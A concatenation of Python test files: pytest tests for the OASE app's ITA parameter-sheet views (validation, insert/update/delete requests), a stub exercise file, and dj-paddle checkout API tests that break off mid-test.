from libs.commonlibs import define as defs
from web_app.models.models import ActionType, DriverType, User, PasswordHistory
from web_app.views.system.ITA_paramsheet import _get_param_match_info, _make_disp_name, _validate, modify as paramsheet_modify
from web_app.views.system.ITA_paramsheet import _get_param_item_info
def get_adminstrator():
"""
サイトにログインしwebページをクロールできるシステム管理者を返す
ユーザデータの加工、セッションの保存の後ログインをしている。
"""
password = 'OaseTest@1'
admin = User.objects.get(pk=1)
admin.password = Common.oase_hash(password)
admin.last_login = datetime.datetime.now(pytz.timezone('UTC'))
admin.password_last_modified = datetime.datetime.now(pytz.timezone('UTC'))
admin.save(force_update=True)
PasswordHistory.objects.create(
user_id=1,
password=Common.oase_hash(password),
last_update_timestamp=datetime.datetime.now(pytz.timezone('UTC')),
last_update_user=admin.user_name
)
client = Client()
session = client.session
session['cookie_age'] = (
datetime.datetime.now(pytz.timezone('UTC')) +
datetime.timedelta(minutes=30)
).strftime('%Y-%m-%d %H:%M:%S')
session.save()
_ = client.login(username='administrator', password=password)
return client
@pytest.fixture(scope='function')
def ITAparamsheet_actiontype_data():
"""
アクション種別設定データ作成(正常系テスト用)
"""
ActionType(
action_type_id = 999,
driver_type_id = 1,
disuse_flag = '0',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ActionType.objects.filter(action_type_id=999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_itadriver_data():
"""
アクション設定データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaDriver = getattr(module, 'ItaDriver')
ItaDriver(
ita_driver_id = 999,
ita_disp_name = 'ITA_1-3-0_pytest',
hostname = 'host_pytest',
username = 'pytest',
password = 'pytest',
protocol = 'https',
port = 443,
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaDriver.objects.filter(ita_driver_id=999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_itaparammatchinfo_data():
"""
ITAパラメータ抽出条件データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaParameterMatchInfo = getattr(module, 'ItaParameterMatchInfo')
ItaParameterMatchInfo(
match_id = 999,
ita_driver_id = 999,
menu_id = 999,
parameter_name = 'パラメーター名',
order = 0,
conditional_name = '条件名',
extraction_method1 = '',
extraction_method2 = '',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaParameterMatchInfo.objects.filter(match_id=999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_itamenuname_data():
"""
ITAパラメータ抽出条件データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaMenuName = getattr(module, 'ItaMenuName')
ItaMenuName(
ita_menu_name_id = 999,
ita_driver_id = 999,
menu_group_id = 999,
menu_id = 999,
menu_group_name = 'group',
menu_name = 'menu',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaMenuName.objects.filter(ita_menu_name_id=999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_itaparammatchinfo_data_forupdate():
"""
ITAパラメータ抽出条件データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaParameterMatchInfo = getattr(module, 'ItaParameterMatchInfo')
ItaParameterMatchInfo(
match_id = 1,
ita_driver_id = 1,
menu_id = 999,
parameter_name = 'パラメーター名',
order = 0,
conditional_name = '条件名',
extraction_method1 = '',
extraction_method2 = '',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
ItaParameterMatchInfo(
match_id = 2,
ita_driver_id = 2,
menu_id = 999,
parameter_name = 'パラメーター名',
order = 0,
conditional_name = '条件名',
extraction_method1 = '',
extraction_method2 = '',
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaParameterMatchInfo.objects.filter(menu_id = 999).delete()
@pytest.fixture(scope='function')
def ITAparamsheet_paraminfo_data():
"""
ITAパラメーター項目情報データ作成(正常系テスト用)
"""
module = import_module('web_app.models.ITA_models')
ItaParameterItemInfo = getattr(module, 'ItaParameterItemInfo')
ItaParameterItemInfo(
ita_driver_id = 999,
menu_id = 999,
column_group = 'pytest_col_grp',
item_name = 'pytest項目名',
item_number = 99,
ita_order = 1,
last_update_timestamp = datetime.datetime.now(pytz.timezone('UTC')),
last_update_user = 'pytest'
).save(force_insert=True)
yield
ItaParameterItemInfo.objects.filter(ita_driver_id=1, item_number=99).delete()
@pytest.mark.django_db
class TestITAParamSheet(object):
"""
web_app/views/system/ITA_paramsheet.pyのテストクラス
(render後のtemplate実装内容含めた画面出力結果の確認)
"""
###########################################
    # Common-part tests
###########################################
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data',
'ITAparamsheet_itamenuname_data'
)
def test_get_param_match_info_ok(self):
"""
ITAパラメータ抽出条件情報を取得
※ 正常系
"""
data_list, drv_info, menu_info, item_info = _get_param_match_info(
1,
[defs.VIEW_ONLY, defs.ALLOWED_MENTENANCE],
[1]
)
assert len(data_list) > 0
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data',
'ITAparamsheet_itamenuname_data'
)
def test_get_param_match_info_ng_ver(self):
"""
ITAパラメータ抽出条件情報を取得
※ 異常系(バージョン不一致)
"""
sts_code = 200
try:
data_list, drv_info, menu_info, item_info = _get_param_match_info(
0,
[defs.VIEW_ONLY, defs.ALLOWED_MENTENANCE],
[1]
)
except Http404:
sts_code = 404
assert sts_code == 404
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data',
'ITAparamsheet_itamenuname_data'
)
def test_make_disp_name_ok(self):
"""
文字列結合処理
※ 正常系
"""
module = import_module('web_app.models.ITA_models')
ItaMenuName = getattr(module, 'ItaMenuName')
Itaname_dict = ItaMenuName.objects.values('ita_driver_id', 'menu_group_id', 'menu_id', 'menu_group_name', 'menu_name')
ita_driver_id = 999
menu_id = 999
disp_name = _make_disp_name(Itaname_dict, ita_driver_id, menu_id)
assert len(disp_name) > 0
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data',
'ITAparamsheet_itamenuname_data'
)
def test_make_disp_name_ng(self):
"""
文字列結合処理
※ データが一致しない場合
"""
module = import_module('web_app.models.ITA_models')
ItaMenuName = getattr(module, 'ItaMenuName')
Itaname_dict = ItaMenuName.objects.values('ita_driver_id', 'menu_group_id', 'menu_id', 'menu_group_name', 'menu_name')
ita_driver_id = 1
menu_id = 1
disp_name = _make_disp_name(Itaname_dict, ita_driver_id, menu_id)
assert disp_name is None
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ok(self):
"""
Validation
* Normal case
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert error_flag is False
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_matchid(self):
"""
Validation
* Error case (match_id to update does not exist)
"""
json_str = (
'{"json_str": ['
'{"ope": "2",'
' "match_id": "998",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27312' in error_msg['1']['ita_driver_id']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_driverid(self):
"""
Validation
* Error case (specified driver_id does not exist)
"""
json_str = (
'{"json_str": ['
'{"ope": "2",'
' "match_id": "999",'
' "ita_driver_id": "0",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27313' in error_msg['1']['ita_driver_id']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_duplicate(self):
"""
Validation
* Error case (unique constraint violation)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"},'
'{"ope": "1",'
' "match_id": "998",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "2"}'
']}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27314' in error_msg['2']['ita_driver_id']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_menuid_empty(self):
"""
Validation
* Error case (menu_id is empty)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27317' in error_msg['1']['menu_id']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_parametername_empty(self):
"""
Validation
* Error case (parameter_name is empty)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27318' in error_msg['1']['parameter_name']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_parametername_length(self):
"""
Validation
* Error case (parameter_name exceeds the maximum length)
"""
param_name = (
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
)
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "%s",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
) % (param_name)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27319' in error_msg['1']['parameter_name']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_order_empty(self):
"""
Validation
* Error case (order is empty)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27320' in error_msg['1']['order']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_conditionalname_empty(self):
"""
Validation
* Error case (conditional_name is empty)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27321' in error_msg['1']['conditional_name']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_conditionalname_length(self):
"""
Validation
* Error case (conditional_name exceeds the maximum length)
"""
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "1234567890123456789012345678901234567890",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27322' in error_msg['1']['conditional_name']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_method1_length(self):
"""
Validation
* Error case (extraction_method1 exceeds the maximum length)
"""
method_val = (
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
)
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "%s",'
' "extraction_method2": "",'
' "row_id": "1"}]}'
) % (method_val)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27323' in error_msg['1']['extraction_method1']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_actiontype_data',
'ITAparamsheet_itadriver_data',
'ITAparamsheet_itaparammatchinfo_data'
)
def test_validate_ng_method2_length(self):
"""
Validation
* Error case (extraction_method2 exceeds the maximum length)
"""
method_val = (
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
"1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"
)
json_str = (
'{"json_str": ['
'{"ope": "1",'
' "match_id": "999",'
' "ita_driver_id": "999",'
' "menu_id": "999",'
' "parameter_name": "ホスト名",'
' "order": "0",'
' "conditional_name": "メッセージ本文",'
' "extraction_method1": "(?<=(対象ノード|対象ホスト)= )[a-zA-Z0-9_-]+",'
' "extraction_method2": "%s",'
' "row_id": "1"}]}'
) % (method_val)
json_str = json.loads(json_str)
records = json_str['json_str']
version = 1
request = None
error_flag, error_msg = _validate(records, version, request)
assert 'MOSJA27324' in error_msg['1']['extraction_method2']
@pytest.mark.usefixtures(
'ita_table',
'ITAparamsheet_paraminfo_data'
)
def test_get_param_item_info_ok(self):
"""
Fetch parameter item info
* Normal case
"""
filter_info = {
'ita_driver_id' : 999,
'menu_id' : 999,
}
item_info = _get_param_item_info('ItaParameterItemInfo', filter_info)
assert len(item_info[999][999]) >= 2
###########################################
# View screen tests
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_actiontype_data')
def test_index_ok(self, admin):
"""
Display the view screen
* Normal case
"""
response = admin.get(reverse('web_app:system:paramsheet', args=[1,]))
content = response.content.decode('utf-8')
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table')
def test_index_ng(self, admin):
"""
Display the view screen
* Error case
"""
response = admin.get(reverse('web_app:system:paramsheet', args=[0,]))
content = response.content.decode('utf-8')
assert response.status_code == 404
###########################################
# Edit screen tests
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_actiontype_data')
def test_edit_ok(self, admin):
"""
Display the edit screen
* Normal case
"""
response = admin.post(reverse('web_app:system:paramsheet_edit', args=[1,]))
content = response.content.decode('utf-8')
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table')
def test_edit_ng(self, admin):
"""
Display the edit screen
* Error case
"""
response = admin.post(reverse('web_app:system:paramsheet_edit', args=[0,]))
content = response.content.decode('utf-8')
assert response.status_code == 404
###########################################
# Insert function tests
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_insert_ok(self, admin, monkeypatch):
"""
Extraction condition table insert
* Normal case
"""
admin = get_adminstrator()
# Insert request
json_str = {
'json_str': [
{
'ope': '1',
'match_id': '2',
'ita_driver_id': '1',
'menu_id': '1',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '1',
'match_id': '3',
'ita_driver_id': '1',
'menu_id': '1',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (False, {}))
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_insert_ng(self, admin, monkeypatch):
"""
Extraction condition table insert
* Error case
"""
admin = get_adminstrator()
with pytest.raises(Exception):
response = admin.post(path=reverse('web_app:system:paramsheet_modify', args=[0,]), content_type='application/json')
assert False
json_str = {
'json_str': [
{
'ope': '1',
'match_id': '2',
'ita_driver_id': '1',
'menu_id': '1',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '1',
'match_id': '3',
'ita_driver_id': '1',
'menu_id': '1',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[999,]), {'json_str':json_data})
assert response.status_code == 404
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (True, {'xxx'}))
with pytest.raises(Exception):
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert False
###########################################
# Delete function tests
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_delete_ok(self, admin, monkeypatch):
"""
Extraction condition table delete
* Normal case
"""
admin = get_adminstrator()
# Delete request
json_str = {
'json_str': [
{
'ope': '3',
'match_id': '999',
'ita_driver_id': '999',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
}
]
}
json_data = json.dumps(json_str)
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (False, {}))
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_delete_ng(self, admin):
"""
Extraction condition table delete
* Error case
"""
admin = get_adminstrator()
# Delete request
json_str = {
'json_str': [
{
'ope': '3',
'match_id': '999',
'ita_driver_id': '999',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
}
]
}
json_data = json.dumps(json_str)
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[999,]), {'json_str':json_data})
assert response.status_code == 404
###########################################
# Update function tests
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data_forupdate')
def test_modify_update_ok(self, admin, monkeypatch):
"""
Extraction condition table update
* Normal case
"""
admin = get_adminstrator()
# Update request
json_str = {
'json_str': [
{
'ope': '2',
'match_id': '1',
'ita_driver_id': '1',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '2',
'match_id': '2',
'ita_driver_id': '2',
'menu_id': '999',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (False, {}))
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert response.status_code == 200
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data_forupdate')
def test_modify_update_ng(self, admin):
"""
Extraction condition table update
* Error case
"""
admin = get_adminstrator()
# Update request
json_str = {
'json_str': [
{
'ope': '2',
'match_id': '1',
'ita_driver_id': '1',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '2',
'match_id': '2',
'ita_driver_id': '2',
'menu_id': '999',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[999,]), {'json_str':json_data})
assert response.status_code == 404
###########################################
# Combined insert/update/delete tests
###########################################
@pytest.mark.usefixtures('ita_table', 'ITAparamsheet_itaparammatchinfo_data')
def test_modify_crud_ok(self, admin, monkeypatch):
"""
Extraction condition table insert/update/delete
* Normal case
"""
admin = get_adminstrator()
# Insert/update/delete request
json_str = {
'json_str': [
{
'ope': '1',
'match_id': '3',
'ita_driver_id': '3',
'menu_id': '999',
'parameter_name': 'メッセージ',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '2',
'match_id': '1',
'ita_driver_id': '1',
'menu_id': '999',
'parameter_name': 'ホスト名',
'order': '0',
'conditional_name': 'メッセージ本文',
'extraction_method1': '対象ノード=(\\w+)',
'extraction_method2': '対象ノード=',
'row_id': '2'
},
{
'ope': '3',
'match_id': '2',
'ita_driver_id': '2',
'menu_id': '999',
'parameter_name': 'プロセス',
'order': '1',
'conditional_name': 'メッセージ本文',
'extraction_method1': 'pid=\\d*',
'extraction_method2': 'pid=',
'row_id': '3'
}
]
}
json_data = json.dumps(json_str)
module = getattr(import_module('web_app.views.system'), 'ITA_paramsheet')
monkeypatch.setattr(module, '_validate', lambda x, y, z: (False, {}))
response = admin.post(reverse('web_app:system:paramsheet_modify', args=[1,]), {'json_str':json_data})
assert response.status_code == 200
###########################################
# pythonProject/MUNDO 3/Desafio 80 F.py
# repo: lucasjlgc/Aulas-de-Python- (MIT)
###########################################
print('#FAZER O DESAFIO 80')
print('#FAZER O DESAFIO 80')
print('#FAZER O DESAFIO 80')
###########################################
# tests/test_post_checkout_api.py
# repo: adamchainz/dj-paddle (MIT)
###########################################
from datetime import datetime
from urllib.parse import urlencode
import pytz
from django.test import Client, TestCase
from django.urls import reverse
from djpaddle.models import Checkout
from djpaddle.utils import PADDLE_DATETIME_FORMAT
class TestPostCheckoutApi(TestCase):
def _api_request(self, url, data):
return Client().post(
url, data, content_type="application/x-www-form-urlencoded",
)
def test_checkout_api(self):
completed = True
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": '{"organisation": "PKG-Deploy", "user_id": "1"}',
"email": "pyematt@gmail.com",
"created_at": "2020-05-22 23:42:02",
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 204)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_next_redirect(self):
completed = True
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": '{"organisation": "PKG-Deploy", "user_id": "1"}',
"email": "pyematt@gmail.com",
"created_at": "2020-05-22 23:42:02",
}
payload = urlencode(data)
redirect_url = "/someurl"
url = reverse("djpaddle:post_checkout_api")
url = "{0}?next={1}".format(url, redirect_url)
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 200)
response = resp.json()
redirect_url = "{0}?checkout={1}".format(redirect_url, data["id"])
self.assertEqual(response["redirect_url"], redirect_url)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_paddle_redirect(self):
completed = True
redirect_url = "http://example.com/checkout/success"
data = {
"id": "11111111-aaaa8f3706b5378-17fba8a806",
"completed": str(completed).lower(),
"passthrough": '{"organisation": "PKG-Deploy", "user_id": "1"}',
"email": "pyematt@gmail.com",
"created_at": "2020-05-22 23:42:02",
"redirect_url": redirect_url,
}
payload = urlencode(data)
url = reverse("djpaddle:post_checkout_api")
resp = self._api_request(url, payload)
self.assertEqual(resp.status_code, 200)
response = resp.json()
redirect_url = "{0}?checkout={1}".format(redirect_url, data["id"])
self.assertEqual(response["redirect_url"], redirect_url)
checkout = Checkout.objects.get(pk=data["id"])
self.assertEqual(checkout.completed, completed)
self.assertEqual(checkout.passthrough, data["passthrough"])
self.assertEqual(checkout.email, data["email"])
created = datetime.strptime(data["created_at"], PADDLE_DATETIME_FORMAT)
self.assertEqual(checkout.created_at, created.replace(tzinfo=pytz.UTC))
def test_checkout_api_next_and_paddle_redirect(self):
completed = True
redirect_url = "http://example.com/checkout/success"
data = {
